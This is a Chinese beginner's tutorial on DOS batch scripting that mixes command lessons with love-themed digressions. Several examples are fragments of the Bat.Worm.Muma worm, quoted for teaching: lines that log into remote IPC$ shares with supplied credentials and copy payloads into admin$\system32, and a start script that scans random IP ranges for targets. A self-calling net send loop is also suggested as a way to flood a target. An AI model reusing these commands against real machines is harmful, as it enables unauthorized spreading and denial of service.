寫這篇教程的目的,是讓每一個看過這些文字的朋友記住一句話:如果愛可以讓事情變的更簡單,那麼就讓它簡單吧!看這篇教程的方法
腳本之家補充說明:批處理相對來說是比較簡單的語言,大家可以通過多寫多看別人的實例來學習,不懂的百度一下。
這是一篇技術教程,真心誠意會用很簡單的文字表達清楚自己的意思,只要你識字就能看懂,就能學到知識。寫這篇教程的目的,是讓每一個看過這些文字的朋友記住一句話:如果愛可以讓事情變的更簡單,那麼就讓它簡單吧!看這篇教程的方法,就是慢!慢慢的,如同品一個女人、一杯茗茶,你會發現很多以前就在眼前的東西突然變的很遙遠,而有些很遙遠的東西卻又突然回到了眼前。.
先概述一下批處理是個什麼東東。批處理的定義,至今我也沒能給出一個合適的----衆多高手們也都沒給出----反正我不知道----看了我也不一定信服----我是個菜鳥,當然就更不用說了;但我想總結出一個“比較合適的”,而且我也相信自己可以把它解釋的很清楚,讓更多的菜鳥都知道這是個什麼東東,你用這個東東可以幹什麼事情。或許你會因爲這篇文章而“無條件愛上批處理”,那麼我的目的就達到了----我就是要讓你愛上它,我就這麼拽,你能怎麼着??真的,愛有時候就這麼拽,就是這麼沒理由,就是這麼不要臉!真的!
按照我的理解,批處理的本質,是一堆DOS命令按一定順序排列而形成的集合。
OK,never claver and get to business(閒話少說言歸正傳)。批處理,也稱爲批處理腳本,英文譯爲BATCH,批處理文件後綴BAT就取的前三個字母。它的構成沒有固定格式,只要遵守以下這條就ok了:每一行可視爲一個命令,每個命令裏
可以含多條子命令,從第一行開始執行,直到最後一行結束,它運行的平臺是DOS。批處理有一個很鮮明的特點:使用方便、靈活,功能強大,自動化程度高。我不想讓自己寫的教程枯燥無味,因爲牽纏到代碼(批處理的內容算是代碼吧?)
的問題本來就是枯燥的,很少有人能面對滿屏幕的代碼而靜下心來。所以我會用很多簡單實用的例子讓讀這篇教程的朋友去體會批處理的那四射的魅力,感受它那古靈精怪的性格,不知不覺中愛上批處理(暈,怎麼又是愛?到底批處理和愛有什麼關係?答案:沒有!)。再說句“閒話”:要學好批處理,DOS基礎一定要牢!當然腦子靈活也是很重要的一方面。
例一、先給出一個最easy的批處理腳本讓大家和它混個臉熟,將下面的幾行命令保存爲name.bat然後執行(以後文中只給出代碼,保存和執行方式類似):
複製代碼 代碼如下:
ping sz.tencent.com > a.txt
ping sz1.tencent.com >> a.txt
ping sz2.tencent.com >> a.txt
ping sz3.tencent.com >> a.txt
ping sz4.tencent.com >> a.txt
ping sz5.tencent.com >> a.txt
ping sz6.tencent.com >> a.txt
ping sz7.tencent.com >> a.txt
exit
是不是都能看的懂?是不是很easy?但它的作用卻是很實用的,執行這個批處理後,可以在你的當前盤建立一個名爲a.txt的文件,它裏面記錄的信息可以幫助你迅速找到速度最快的QQ服務器,從而遠離“從服務器中轉”那一痛苦的過程。這裏>的意思,是把前面命令得到的東西放到後面所給的地方,>>的作用,和>的相同,區別是把結果追加到前一行得出的結果的後面,具體的說是下一行,而前面一行命令得出的結果將保留,這樣可以使這個a.txt文件越來越大(想到如何搞破壞了??)。By the way,這個批處理還可以和其他命令結合,搞成完全自動化判斷服務器速度的東東,執行後直接顯示速度最快的服務器IP,是不是很爽?後面還將詳細介紹。
例二、再給出一個已經過時的例子(a.bat):
@echo off
if exist C:\Progra~1\Tencent\AD\*.gif del C:\Progra~1\Tencent\AD\*.gif
a.bat
爲什麼說這是個過時的例子呢?很簡單,因爲現在已經幾乎沒有人用帶廣告的QQ了(KAO,我的QQ還顯示好友三圍呢!!),所以它幾乎用不上了。但曾經它的作用是不可小窺的:刪除QQ的廣告,讓對話框乾乾淨淨。這裏用的地址是QQ的默認安裝地址,默認批處理文件名爲a.bat,你當然可以根據情況自行修改。在這個腳本中使用了if命令,使得它可以達到適時判斷和刪除廣告圖片的效果,你只需要不關閉命令執行後的DOS窗口,不按CTRL+C強行終止命令,它就一直監視是否有廣告圖片(QQ也再不斷查看自己的廣告是否被刪除)。當然這個腳本佔用你一點點內存,呵呵。
例三,使用批處理腳本查是否中冰河。腳本內容如下:
複製代碼 代碼如下:
@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit
這裏利用了netstat命令,檢查所有的網絡端口狀態,只需要你清楚常見木馬所使用的端口,就能很easy的判斷出來是否
被人種了冰河。然這不是確定的,因爲冰河默認的端口7626,完全可以被人修改。這裏介紹的只是方法和思路。這裏介紹
的是方法和思路稍做改動,就變成可以檢查其他木馬的腳本了,再改動一下,加進去參數和端口及信息列表文件後,就變
成自動檢測所有木馬的腳本了。呵呵,是不是很過癮?腳本中還利用了組合命令&&和管道命令|,後面將詳細介紹。
例四,借批處理自動清除系統垃圾,腳本如下:
複製代碼 代碼如下:
@echo off
if exist c:\windows\temp\*.* del c:\windows\temp\*.*
if exist c:\windows\Tempor~1\*.* del c:\windows\Tempor~1\*.*
if exist c:\windows\History\*.* del c:\windows\History\*.*
if exist c:\windows\recent\*.* del c:\windows\recent\*.*
將以上腳本內容保存到autoexec.bat裏,每次開機時就把系統垃圾給自動刪除了。這裏需要注意兩點:一、DOS不支持長文件名,所以就出現了Tempor~1這個東東;二、可根據自己的實際情況進行改動,使其符合自己的要求。
怎麼樣,看到這裏,你對批處理腳本是不是已經有點興趣了?是不是發現自己已經慢慢愛上了這個東東?別高興的太早,愛不是一件簡單的事,它也許能帶給你快樂和幸福,當然也能讓你痛苦的想去跳樓。如果你知道很難還敢繼續的話,I 服 了 YOU!繼續努力吧,也許到最後你不一定得到真愛(真的有這可能,愛過的人都知道),但你可以體會到整個愛的過程,就是如此。 酸、苦和辣,有沒有甜天知道。
爲什麼會把批處理和愛情扯上關係?不是我無聊,也不是因爲這樣寫有趣多少,原因有二:其一,批處理和愛情有很多相同的地方,有些地方我用“專業”的行話解釋不清(我不懷疑自己的表達能力,而是事情本身就不好說清楚),說了=沒說,但用地球人都知道的愛情一比喻(愛情是什麼?我**怎麼知道!!),沒準你心裏一下就亮堂了,事半功倍,何樂而不爲?其二,我這段時間狀態不是很好,感冒發燒頭疼鼻塞,但主要還是感情上精神摧殘,搞的人煩透了,借寫教程之際感慨幾句,大家就全當買狗皮膏藥了,完全可以省略不看(也許還真有點效果----不至於讓你看着看着就睡着了,把頭磕了來找我報銷醫藥費)。說不定下次的教程中大家還會看到楊過、張無忌等金老前輩筆下的英雄們。
看過第一章的朋友,一定對批處理有了初步的印象,知道它到底是用來幹什麼的了。但你知道運用批處理的精髓在哪裏嗎 ?其實很簡單:思路要靈活!沒有做不到的,只有想不到的。這和愛情就有點不同了,因爲愛情的世界是兩個人的世界,一廂情願不叫愛情(補充:那叫單戀。廢話!)而批處理卻是一個人的天堂,你可以爲所欲爲,沒有達不到的境界!
批處理看起來雜亂無章,但它的邏輯性之強,絕對不比其他程序語言(如彙編)低,如果你寫的腳本是一堆亂麻,雖然每一行命令都正確,但從頭執行到尾後,不一定得到你想要的結果,也許是一屏幕的Bad command or fail name。這又和愛情有了共同點:按步驟來經營,缺少或增多的步驟都可能導致不想看見的結果。陷入愛河的朋友,相信沒有不肯定這句話的。我的愛情批處理,輸出的結果不是Bad command or fail name,屏幕是這麼顯示的:‘你的愛情'不是內部或外部命令,也不是可運行的程序或批處理文件。然後就是光標不停閃動,等待這下一次錯誤的輸入。
從這一章開始,將由淺入深的介紹批處理中常用的命令,很多常見DOS命令在批處理腳本中有這廣泛的應用,它們是批處理腳本的BODY部分,但批處理比DOS更靈活多樣,更具備自動化。要學好批處理,DOS一定要有比較紮實的基礎。這裏只講述一些比較少用(相對來說)的DOS命令,常用命令如COPY、DIR等就不做介紹了(這些看似簡單的命令實際複雜的很,我怕自己都說不清楚!)。
例五,先看一個實例。這是一個很有意思的腳本,一個小巧實用的好東東,把批處理“自動化”的特點體現的淋漓盡致。先介紹一下這個腳本的來歷:大家都知道彙編程序(MASM)的上機過程,先要對源代碼進行彙編、連接,然後再執行,而這中間有很多環節需要輸入很多東西,麻煩的很(只有經歷過的朋友才懂得)。如何使這個過程變的簡單呢?在我們搞彙編課程設計時,我“被逼”寫了這個腳本,用起來很爽,呵呵。看看腳本內容:
複製代碼 代碼如下:
@echo off
::close echo
cls
::clean screen
echo This programme is to make the MASM programme automate
::display info
echo Edit by CODERED
::display info
echo Mailto me : qqkiller***@sina.com
::display info
if "%1"=="" goto usage
::if input without paramater goto usage
if "%1"=="/?" goto usage
::if paramater is "/?" goto usage
if "%1"=="help" goto usage
::if paramater is "help" goto usage
pause
::pause to see usage
masm %1.asm
::assemble the .asm code
if errorlevel 1 pause & edit %1.asm
::if error pause to see error msg and edit the code
link %1.obj & %1
::else link the .obj file and execute the .exe file
:usage
::set usage
echo Usage: This BAT file name [asm file name]
echo Default BAT file name is START.BAT
::display usage
先不要被這一堆的東西給嚇怕了,靜下心來仔細的看(回想一下第一章中第一段是怎麼寫的!!)。已經給出了每一行命令的解釋,兩個冒號後面的內容爲前一行內容解釋的E文(害怕E文的朋友也不用擔心,都很easy,一看就懂了,實在不懂了不會查詞典啊,這麼懶?),在腳本執行時不顯示,也不起任何作用。倒數第5行行首有一個冒號,可不是筆誤哦!具體作用後面會詳細講到。此腳本中masm和link是彙編程序和連接程序,必須和edit程序以及你要編輯的源代碼(當然還有這個腳本,廢話!)一起在當前目錄中。使用這個批處理腳本,可以最大可能的減少手工輸入,整個過程中只需要按幾下回車鍵,即可實現從彙編源代碼到可執行exe文件的自動化轉換,並具備智能判斷功能:如果彙編時源代碼出現錯誤(彙編不成功),則自動暫停顯示錯誤信息,並在按任意鍵後自動進入編輯源代碼界面;如果源代碼彙編成功,則進行連接,並在連接後自動執行生成的exe文件。另外,由於批處理命令的簡單性和靈活性,這個腳本還具備良好的可改進性,簡單進行修改就可以符合不同朋友的上機習慣。正在學彙編的朋友,一定別忘了實習一下!
在這個腳本中出現瞭如下幾個命令:@、echo、::、pause、:和goto、%以及if。而這一章就將講述這幾個命令。
1、@
這個符號大家都不陌生,email的必備符號,它怎麼會跑到批處理中呢?呵呵,不是它的錯,批處理本來就離不開它,要不就不完美了。它的作用是讓執行窗口中不顯示它後面這一行的命令本身(多麼繞口的一句話!)。呵呵,通俗一點說,行首有了它的話,這一行的命令就不顯示了。在例五中,首行的@echo off中,@的作用就是讓腳本在執行時不顯示後面的echo off部分。這下懂了吧?還是不太懂?沒關係,看完echo命令簡介,自然就懂了。
2、echo
中文爲“反饋”、“回顯”的意思。它其實是一個開關命令,就是說它只有兩種狀態:打開和關閉。於是就有了echo on 和echo off兩個命令了。直接執行echo命令將顯示當前echo命令狀態(off或on)執行echo off將關閉回顯,它後面的所有命令都不顯示命令本身,只顯示執行後的結果,除非執行echo on命令。在例五中,首行的@命令和echo off命令聯合起來,達到了兩個目的:不顯示echo off命令本身,不顯示以後各行中的命令本身。的確是有點亂,但你要是練習一下的話,3分鐘包會,不會的退錢!
echo命令的另一種用法一:可以用它來顯示信息!如例五中倒數第二行,Default BAT file name is START.BAT將在腳本執行後的窗口中顯示,而echo命令本身不顯示(爲什麼??)。
echo命令的另一種用法二:可以直接編輯文本文件。
例六:
複製代碼 代碼如下:
echo nbtstat -A 192.168.0.1 > a.bat
echo nbtstat -A 192.168.0.2 >> a.bat
echo nbtstat -A 192.168.0.3 >> a.bat
以上腳本內容的編輯方法是,直接是命令行輸入,每行一回車。最後就會在當前目錄下生成一個a.bat的文件,直接執行就會得到結果。
3、::
這個命令的作用很簡單,它是註釋命令,在批處理腳本中和rem命令等效。它後面的內容在執行時不顯示,也不起任何作用,因爲它只是註釋,只是增加了腳本的可讀性,和C語言中的/*…………*/類似。地球人都能看懂,就不多說了。
4、pause
中文爲“暫停”的意思(看看你的workman上),我一直認爲它是批處理中最簡單的一個命令,單純、實用。它的作用,是讓當前程序進程暫停一下,並顯示一行信息:請按任意鍵繼續. . .。在例五中這個命令運用了兩次,第一次的作用是讓使用者看清楚程序信息,第二個是顯示錯誤的彙編代碼信息(其實不是它想顯示,而是masm程序在顯示錯誤信息時被暫它停了,以便讓你看清楚你的源代碼錯在哪裏)。
5、:和goto
爲什麼要把這兩個命令聯合起來介紹?因爲它們是分不開的,無論少了哪個或多了哪個都會出錯。goto是個跳轉命令,: 是一個標籤。當程序運行到goto時,將自動跳轉到:定義的部分去執行了(是不是分不開?)。例五中倒數第5行行首出現一個:,則程序在運行到goto時就自動跳轉到:標籤定義的部分執行,結果是顯示腳本usage(usage就是標籤名稱)。不難看出,goto命令就是根據這個冒號和標籤名稱來尋找它該跳轉的地方,它們是一一對應的關係。goto命令也經常和if命令結合使用。至於這兩個命令具體用法,參照例五。
goto命令的另一種用法一:提前結束程序。在程序中間使用goto命令跳轉到某一標籤,而這一標籤的內容卻定義爲退出。
如:
……
goto end
……
:end
這裏:end在腳本最後一行!其實這個例子很弱智,後面講了if命令和組合命令你就知道了。
6、%
這個百分號嚴格來說是算不上命令的,它只是批處理中的參數而已(多個%一起使用的情況除外,以後還將詳細介紹),但千萬別以爲它只是參數就小看了它(看看例五中有多少地方用到它?),少了它批處理的功能就減少了51%了。看看例
七:
複製代碼 代碼如下:
net use \\%1\ipc$ %3 /u:"%2"
copy 11.BAT \\%1\admin$\system32 /y
copy 13.BAT \\%1\admin$\system32 /y
copy ipc2.BAT \\%1\admin$\system32 /y
copy NWZI.EXE \\%1\admin$\system32 /y
attrib \\%1\admin$\system32⏺.bat -r -h -s
以上代碼是Bat.Worm.Muma病毒中的一部分,%1代表的IP,2%代表的username,3%代表password。執行形式爲:腳本文件名 參數一 參數二 ……。假設這個腳本被保存爲a.bat,則執行形式如下:a IP username password。這裏IP、username、password是三個參數,缺一不可(因爲程序不能正確運行,並不是因爲少了參數語法就不對)這樣在腳本執行過程中,腳本就自動用用你的三個參數依次(記住,是依次!也是一一對應的關係。)代換1%、2%和3%,這樣就達到了靈活運用的目的(試想,如果在腳本中直接把IP、username和password都定義死,那麼腳本的作用也就被固定了,但如果使用%的話,不同的參數可以達到不同的目的,是不是更靈活?)。
關於這個參數的使用,在後續章節中還將介紹。一定要非常熟練才行,這需要很多練習過程,需要下點狠工夫!
這一章就寫到這裏了。可能有朋友問了:怎麼沒介紹if命令?呵呵,不是我忘了,而是它不容易說清楚,下一章再講了!這一章講的這點東西,如果你是初學者,恐怕也夠消化的了。記住一句話:DOS是批處理的BODY,任何一個DOS命令都可以被用在批處理腳本中去完成特定的功能。到這裏,你是否已經想到了用自己肚子裏的東西去寫點帶有自動化色彩的東東呢
?很簡單,就是一個DOS命令的集合而已,相信自稱爲天才的你已經會把計算機等級考試上機試題中的DOS部分用批處理來自動化完成了。
煩!就好象一個半老女人到了更年期,什麼事都想嘮叨幾句,什麼事都感到不舒服,看誰誰不爽。明知山有虎,偏向虎山行,最後留下一身傷痕無功而返時,才發現自己竟然如此脆弱,如此渺小,如此不堪一擊。徘徊在崩潰的邊緣,突然回想起了自己最後一次扁人的那一刻,還真有點懷念(其實我很不喜歡扁人,更不喜歡被人扁)。我需要發泄,我用手指拼命的敲打着鍵盤,在一陣接一陣有節奏的聲音中,屏幕上出現了上面的這些文字。可難道這就是發泄的另一種方式嗎?中國人還是厲害,早在幾千年前孔老夫子就說過“唯女子與小人,難養也”,真**有先見之明,佩服!雖然是在發泄,不過大家請放心,以我的脾氣,既然決定寫這篇教程,就一定會盡力去寫好,寫完美,絕對不給自己留下遺憾,要不這教程就不是我寫的!
曾經有一篇經典的批處理教程出現在你的屏幕上,你沒有保存,直到找不到它的鏈接你才後悔莫及,人世間最大的痛苦莫過於此。如果上天能給你一個再看一次的機會,你會對那篇教程說三個字:我愛你!如果非要給這份愛加上一個期限,你希望是100年。因爲100年後,你恐怕早已經掛了!而現在,你的屏幕上出現了這篇你正在看的批處理教程,雖然不如你曾經看的那篇經典,但如果勉強還過的去。你會愛它嗎?時間會有50年那麼長嗎?答案是:試試看吧。
批處理腳本中最重要的幾個命令,將在這一章詳細介紹,但是很遺憾,有些細節到現在我都沒掌握的很好,甚至還有些生分。如同還不太懂得愛一樣。但我一直都在努力,即使一直都沒有收穫。所以可能講的會比較籠統,但我會告訴你方法,剩下的就是時間問題了,需要自己去磨練。讓我們共同努力吧。冰凍三尺非一日之寒,滴水穿石非一日之功。有些事情,比如學批處理,比如愛一個人,都是不能速成的,甚至還會有付出艱辛而收穫爲甚微的情況。再次重申,看這篇教程的時候,一定要靜下心來,除非你已經掌握了這篇教程的所有東西----但那也就不必看了,浪費時間!
7、if
接上一章,接着講if命令。總的來說,if命令是一個表示判斷的命令,根據得出的每一個結果,它都可以對應一個相應的好啊作。關於它的三種用法,在這裏分開講。
(1)、輸入判斷。還是用例五里面的那幾句吧:
複製代碼 代碼如下:
if "%1"=="" goto usage
if "%1"=="/?" goto usage
if "%1"=="help" goto usage
這裏判斷輸入的參數情況,如果參數爲空(無參數),則跳轉到usage;如果參數爲/?或help時(大家一般看一個命令的幫助,是不是輸入的/?或help呢,這裏這麼做只是爲了讓這個腳本看起來更像一個真正的程序),也跳轉到usage。這裏還可以用否定形式來表示“不等於”,例如:if not "%1"=="" goto usage,則表示如果輸入參數不爲空就跳轉到usage(實際中這樣做就沒意義了,這裏介紹用法,管不了那麼多了,呵呵。)是不是很簡單?其實翻譯成中文體會一下就understand了。
(2)、存在判斷。再看例二里這句:
if exist C:\Progra~1\Tencent\AD\*.gif del C:\Progra~1\Tencent\AD\*.gif
如果存在那些gif文件,就刪除這些文件。當然還有例四,都是一樣的道理。注意,這裏的條件判斷是判斷存在的,當然也可以判斷不存在的,例如下面這句“如果不存在那些gif文件則退出腳本”:if not exist C:\Progra~1\Tencent\AD\*.gif exit。只是多一個not來表示否定而已。
(3)、結果判斷。還是拿例五開刀(沒想到自己寫的腳本,竟然用處這麼大,呵呵):
複製代碼 代碼如下:
masm %1.asm
if errorlevel 1 pause & edit %1.asm
link %1.obj
先對源代碼進行彙編,如果失敗則暫停顯示錯誤信息,並在按任意鍵後自動進入編輯界面;否則用link程序連接生成的obj文件。這裏只介紹一下和if命令有關的地方,&命令後面會講到。這種用法是先判斷前一個命令執行後的返回碼(也叫錯誤碼,DOS程序在運行完後都有返回碼),如果和定義的錯誤碼符合(這裏定義的錯誤碼爲1),則執行相應的好啊作( 這裏相應的好啊作爲pause & edit %1.asm部分)。
另外,和其他兩種用法一樣,這種用法也可以表示否定。用否定的形式仍表達上面三句的意思,代碼變爲:
masm %1.asm
if not errorlevel 1 link %1.obj
pause & edit %1.asm
看到本質了吧?其實只是把結果判斷後所執行的命令互換了一下,“if not errorlevel 1”和“if errorlevel 0”的效果是等效的,都表示上一句masm命令執行成功(因爲它是錯誤判斷,而且返回碼爲0,0就表示否定,就是說這個錯誤不存在,就是說masm執行成功)。這裏是否加not,錯誤碼到底用0還是1,是值得考慮的兩個問題,一旦搭配不成功腳本就肯定出錯,所以一定要體會的很深刻才行。如何體會的深刻?練習!自己寫一個腳本,然後把有not和沒有not的情況,返回碼爲0或1的情況分別寫進去執行(怎麼,嫌麻煩啊?排列組合算一下才四中情況你就嫌麻煩了?後面介紹管道命令和組合命令時還有更麻煩的呢!怕了?呵呵。),這樣從執行的結果中就能很清楚的看出這兩種情況的區別。
這種用errorlevel結果判斷的用法是if命令最難的用法,但也恰恰是最有用的用法,如果你不會用errorlevel來判斷返回碼,則要達到相同的效果,必須用else來表示“否則”的好啊作,是比較麻煩的。以上代碼必須變成:
masm %1.asm
if exist %1.obj link %1.obj
else pause & edit %1.asm
關於if命令的這三種用法就say到這裏,理解很簡單,但應用時就不一定用的那麼得心應手,主要是熟練程度的問題。可能有的朋友有點驚訝,我怎麼沒給出類似下面三行的用法介紹,是因爲下面三行是if命令幫助裏對它自身用法的解釋,任何人只要一個“if /?”就能看到,我沒有必要在這裏多費口舌;更重要的原因,是我覺得這樣介紹的不清楚,看的人不一定看的懂,所以我採用上面自己對if命令的理解來介紹。一定要注意的是,這三種用法的格式各不相同,而且也是不能改變的,但實際上可以互換(以爲從本質上講,這三種用法都是建立在判斷的基礎上的,哲學教我們學會透過現象看事物
本質!)。有興趣的朋友可以自己研究一下。
IF [NOT] ERRORLEVEL number do command
IF [NOT] string1==string2 do command
IF [NOT] EXIST filename do command
8、call
學過彙編或C的朋友,肯定都知道call指令表示什麼意思了,在這裏它的意思其實也是一樣的。在批處理腳本中,call命令用來從一個批處理腳本中調用另一個批處理腳本。看例八(默認的三個腳本文件名分別爲start.bat、10.bat和ipc.bat
):
start.bat:
……
CALL 10.BAT 0
……
10.bat:
……
ECHO %IPA%.%1 >HFIND.TMP
……
CALL ipc.bat IPCFind.txt
ipc.bat:
for /f "tokens=1,2,3 delims= " %%i in (%1) do call HACK.bat %%i %%j %%k
有沒有看出什麼不對的地方?沒看出來啊?沒看出來就對了,其實就沒有不對的地方嘛,你怎麼看的出來!從上面兩個腳本,你可以得到如下信息:1、腳本調用可以靈活運用,循環運用、重複運用。2、腳本調用可以使用參數!關於第一點就不多說了,聰明的你一看就應該會,這裏說一下第二點。
在start.bat中,10.bat後面跟了參數0,在執行時的效果,其實就是把10.bat裏的參數%1用0代替。在start.bat中,ipc.bat後面跟了參數ipcfind.txt(一個文件,也可以做參數),執行時的效果,就是用ipc.bat中的每一行的三個變量 (這裏不懂沒關係,學過for命令後就懂了),對應代換ipc.bat中的%%i、%%j和%%k。這裏參數調用是非常靈活的,使用時需要好好體會。在初學期間,可以先學習只調用腳本,至於連腳本的參數一起使用的情況,在後面的學習中自然就會有
比較深刻的理解,這是因爲當你已經可以靈活運用批處理腳本後,如何使代碼寫的更精簡更完美更高效就自然包括到了考慮的範圍,這時候你就會發現在調用腳本時直接加入參數,可以使代碼效率加倍。By the way,上面的這幾個腳本,都是Bat.Worm.Muma病毒的一部分,在後面的教程裏,大家將有機會見到這個病毒的真面目。
那是不是說,在同一個目錄下至少存在兩個批處理腳本文件(只有一個你調用誰?)?呵呵,注意了,這句話錯了!!只有一個照樣可以調用----調用自身!看例九(默認腳本文件名a.bat):
net send %1 This is a call example.
call a.bat
這兩句一結合,效果自然不怎麼樣,因爲只有一臺機器來發消息,誰怕誰啊?我給你來個禮尚往來!可如果有100臺機器同時執行,而且每臺機器開10和窗口同時向一個目標機器發消息的話,呵呵。這裏call a.bat的作用就是調用自身,執行完前一句net send命令後再調用自身,達到了循環執行的目的。
給出一個很有意思的腳本,有興趣的朋友可以實驗一下。例十(默認腳本文件名爲a.bat):
call a.bat
一定要在DOS窗口下執行,否則只會看到一個窗口一閃而過,看不到最後結果。等執行完後,當腳本被執行了1260次,別忘了想一下到底是爲什麼!愛情有時候跟這個腳本一樣,一旦陷入死循環,最後的結果都是意想不到的。只是愛情,絕對不會等到被毫無理由的循環這麼多次,也許在第三次時就出現了love is aborted的提示。
9、find
這是一個搜索命令,用來在文件中搜索特定字符串,通常也作爲條件判斷的鋪墊程序(我怎麼突然想起了這四個字?)。
這個命令單獨使用的情況在批處理中是比較少見的,因爲沒什麼實際意義。還是借例三來說明:
@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit
先用netstat命令檢查是否有冰河默認的端口7626在活動,並把結果保存到a.txt中。然後使用type命令列出a.txt中的內容,再在列出的內容中搜索字符串“7626” ,發現有的話則提示中了冰河,否則退出。看,find命令其實就這麼簡單,但有一點必須要注意到:如果不使用type命令列出a.txt中的內容,而是直接使用find命令在a.txt中找“7626”(find a.txt "7626" && echo "Congratulations! You have infected GLACIER!"),就必須得給出這個a.txt的絕對路徑(我試過了,find並沒有默認路徑就是當前路徑的功能,必須手動指定。也許是我錯了,歡迎指正)。因爲在find命令的幫助裏有這麼一句話:如果沒有指定路徑,find將搜索鍵入的或者由另一個命令產生的文字。這裏的“另一個命令”自然就指的type命令了。
至於find命令的其他幾個參數如v、n、i等,有興趣的朋友自己去研究吧,這已經屬於DOS學習的內容了,這裏就不做介紹。關於find命令和其他命令的一些更精妙的用法(有些簡直令人叫絕),後續的教程中將介紹,希望關注。
10、for、set、shift
爲什麼把這三個命令放到一起來講?原因除了我說明外,恐怕誰也想不到!很簡單的一句話:其實我也不太懂!是的,對於這兩個命令,我是從研究Bat.Worm.Muma病毒開始學習的,時間過去了不少,但還是沒完全搞明白,我怕講出來連自己都看不懂,我更怕不小心講錯了成了罪人。所以我給出一個腳本去告訴你,如何讓這兩個命令給自己留一個初步的印象,其實也就是這兩個命令的入門,而並不是說如何領會這兩個命令。因爲要領會如此精妙的兩個命令(特別是for)談何容易!也許你會表揚我說我誠實、不懂就不懂;也許你會罵我,讓我既然不懂就趕緊滾蛋,不要在這裏丟人顯眼;也許你還會說一些別的這樣那樣好聽或不好聽的話,都隨便你了,即使我不同意你說的話,我也會誓死捍衛你說話的權利。看例十
一:
複製代碼 代碼如下:
@echo off
for /? > for.txt
set /? > set.txt
shift /? >shift.txt
exit
執行後在當前路徑下就生成for.txt、set.txt和shift.txt三個文件,裏面分別記錄了for命令、set命令和shift命令的幫助信息。地球人都能看懂,我就不多說了。我在網上曾經找了很長時間這三個命令的教程,但都不理想,基本都是照搬的幫助信息。我想在自己完全掌握了這兩個命令後,一定要寫一篇用自己的文字總結出來的for、set和shift教程(關於shift命令,後面介紹批處理的參數時還將涉及到),一定會的,這是我的心願之一!需要注意的一點是,這三個命令的幫助裏 ,介紹的都比較死板,雖然也舉了一些例子,但這是遠遠不夠的。要掌握這兩個命令,最需要的就是耐心!沒寫錯,就是耐心。光是認真看完它們的幫助文字就已經需要足夠的耐心了,要進一步練習領會這兩個命令,難道不需要更大的耐心?實戰練習的機會我會留給你的,關鍵還是那句話,看你有沒有耐心去研究了。看看例十
二:
START.BAT:
CALL MUMA.BAT
複製代碼 代碼如下:
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET
NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
這是Bat.Worm.Muma病毒的起始腳本,設置了病毒運行的環境變量。是不是看的頭都大了?又忘了寫在第一章第一段的那句話(靜下心來!),你應該能體會到學習這兩個命令所需要的耐心了吧。就如同去愛一個人,你得學會寬容,打不得罵不得,用你寬大的胸懷去包容她的一切,即使你發現愛她的過程如看上面代碼的過程一樣讓你頭大,但你還是得愛下去-
---愛需要理由嗎?不需要嗎?需要嗎?不需要嗎……等到風平浪靜後,最直觀的收穫就是,你的耐心變的前所未有的充足,面對她的複雜和善變,你自己會處變不驚,以自己的方式去從容應付曾經應付不了的場面,即使到最後一身傷痕,也會感慨曾經的舉動有多麼偉大。
沒錯,這就是批處理的魅力,這就是愛的魅力。讓你受了傷還感謝傷你的人。這種感覺就好象在自己最喜歡的音樂聲中被人強姦,痛並快樂着。
不得不再次重申一遍,各種DOS命令是批處理的BODY(我實在找不出一個更合適的詞來形容他們之間的關係),學好DOS命令是學好批處理的前提。其他DOS命令如copy、dir、del、type、path、break、start等內部命令,以及ping、net、cmd、at、sort、attrib、fc、find等外部命令,在批處理裏的應用非常廣泛。這篇教程的作用,是教你認識批處理,以及如何利用DOS命令組合出來一個完美的批處理腳本,去讓它自動完成你想要它做的事情。而靈活自如的編輯一個批處理腳本是建立在熟練掌握DOS命令的基礎上的,這已經超出了本文的範疇,在此就不贅述了。
不知不覺中第三章已經結束了。耳麥裏傳來的依然是陳曉東的《比我幸福》,每隔4分32秒就自動重播。雖然我不併不很喜歡陳曉東,可這並不妨礙我喜歡音樂,喜歡這首描寫的如此讓人感慨的歌。請你一定要比我幸福/纔不枉費我狼狽退出/再痛也不說苦/愛不用抱歉來彌補/至少我能成全你的追逐/請記得你要比我幸福/才值得我對自己殘酷/我默默的倒數/最後再把你看清楚/看你眼裏的我好饃糊/慢慢被放逐。我如同一個因年老失色而拉不到客的老妓女,絕望的徘徊在曾經輝煌的紅燈區,用一臉的木然瞟一眼來來去去的人羣,默默的回憶自己並不光彩的過去,幻想自己將要面對的未來。直到看見那些幸福依偎在一起的情侶們,才突然間發現上帝的公平,和這種公平的殘忍。
可以說,批處理腳本中最重要的幾個命令我都沒有給出如echo或if那樣比較詳細的介紹,原因我已經說了,因爲我也是個菜,我也不太懂----但我正在學!你呢?今天又去了一趟圖書館,淘金一樣發現了一本叫《DOS批文件》的東東,藏在一個角落裏落滿了灰,五本摞一起就跟磚頭一樣厚了。大概翻了一下,裏面介紹了很多比較底層和基礎的東西,雖然從思路上講,已經有點time out了,很多東西已經基本沒有利用的價值(這就是信息時代的更新速度),但還是很值得看的。於是打算下午淘過來,放假回去了再好好研究一番,連同那幾個不熟悉的命令一起搞熟了,再續寫這篇教程。我始終堅信,沒有最好只有更好。
